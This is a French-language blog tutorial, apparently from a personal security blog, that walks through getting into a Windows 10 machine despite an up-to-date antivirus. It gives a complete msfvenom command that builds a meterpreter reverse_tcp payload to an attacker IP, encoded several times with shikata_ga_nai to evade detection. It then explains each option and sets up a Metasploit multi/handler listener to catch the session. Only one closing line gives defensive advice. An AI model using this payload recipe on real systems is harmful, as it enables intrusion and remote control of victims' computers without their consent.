“Un appareil sans antivirus est un appareil exposé aux dangers de l’Internet“.
Ceci est la fameuse phrase qu’utilise la majorité de personnes qui n’en savent pas beaucoup au sujet de la sécurité des systèmes d’informations.Bon je ne les en veux pas tout de même car il faudra quand même valider cette phrase.L’antivirus est aussi un outil très important car il permet de participer à la sécurité des appareils.
Dans ce petit tutoriel,nous allons voir comment il est possible de gagner l’accès à une machine équipée d’un système d’exploitation Windows 10 qui possède un antivirus mis à jour.
Lab:
Kali (Machine attaquante )
Windows 10 (Machine cible avec antivirus mis à jour)
Nous allons simplement ouvrir un terminal sur la machine attaquant et nous allons commencer par utiliser l’outil msfvenom qui va nous permettre de créer notre payload après que nous aillons pris toutes les informations nécessaire sur la machine cible.
Dans le terminal de la machine attaquante,il nous suffira de taper la commande suivante après que nous nous sommes placer sur notre bureau:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.26 LPORT= 4444 -b ‘\x00\xff ‘ -e x86/shikata_ga_nai -i 10 -f exe > payload.exe
Voici quelques petites explications des options ci-dessous:
-p c’est le type de payload qu’on utilise.
LHOST c’est l’adresse IP de la machine attaquante( La machine doit se connecter à notre machine)
LPORT c’est le port qu’on choisie sur la machine attaquante
-b c’est le type de caractères à éviter.
-e c’est l’encodeur.
-i le nombre d’itérations (c’est important à augmenter si possible)
-f c’est le format de sortie
Pour finir notre fichier infecté s’appelle payload.exe
La figure ci-dessus montre bel et bien que le fichier a été crée et si nous souhaitons le vérifier,il nous suffira de taper la commande ls pour lister les éléments présent sur le bureau:
Maintenant que notre fichier est crée,nous allons ouvrir un autre terminal et nous allons d’abord taper les commandes suivantes: msfupdate ; msfdb init pour faire mise à jour s’il existe et nous allons initialiser la base de données de l’outil metasploit.
Si tout se passe bien,nous allons maintenant taper la commande:msfconsole pour lancer notre outil metasploit.
Nous allons lancer le listener en utilisant l’exploit multi/handler et nous allons aussi ajouter l’adresse IP de la machine attaquante et le port d’écoute comme le montre la figure ci-dessous:
Lorsque nous aurons fini,il nous suffira de d’appuyer sur la touche Entrée de notre clavier pour lancer l’écoute et nous aurons le résultat suivant:
Lorsque la machine cible exécutera le fichier infecté ci-dessous:
Nous aurons le résultat suivant du côté de la machine attaquante:
Nous venons d’obtenir une session meterpreter et si nous tapons la commande sysinfo nous aurons ceci:
Nous avons bel et bien l’accès à notre machine cible Windows 10 avec bien évidement un antivirus mise à jour récemment.
Pour résumer nous avons vu comment il était de gagner l’accès à une machine malgré le fait que son antivirus soit mise à jour.Pour ne jamais tomber dans ce genre piège,il ne faut jamais exécuter un fichier dont on ignore la provenance.Pensez toujours à télécharger des fichiers sur le site web de l’éditeur.
N’oubliez pas de me contacter si jamais vous avez des questions allant dans le sens de notre tutoriel.
A très bientôt les amis pour un nouvel article.Mekang!
🙂
Passionné de cryptographie,de sécurité informatique, de mathématiques en gros des nouvelles technologies de l’information et de la communication. J’♥️ aussi le graphisme.Le partage est pour moi le véritable moyen de pouvoir vivre de sa vraie passion.Vous pouvez me contacter de différentes manières:Contact,Facebook,Twitter,Instagram,Pinterest.
Merci beaucoup pour l’article. Comment puisse-je vous contacter ?
Bonjour Herman,
Vous pouvez me contacter via les réseaux sociaux.
Merci pour ce feedback et restez connecté. Vous pouvez me contacter sur mes différents réseaux sociaux.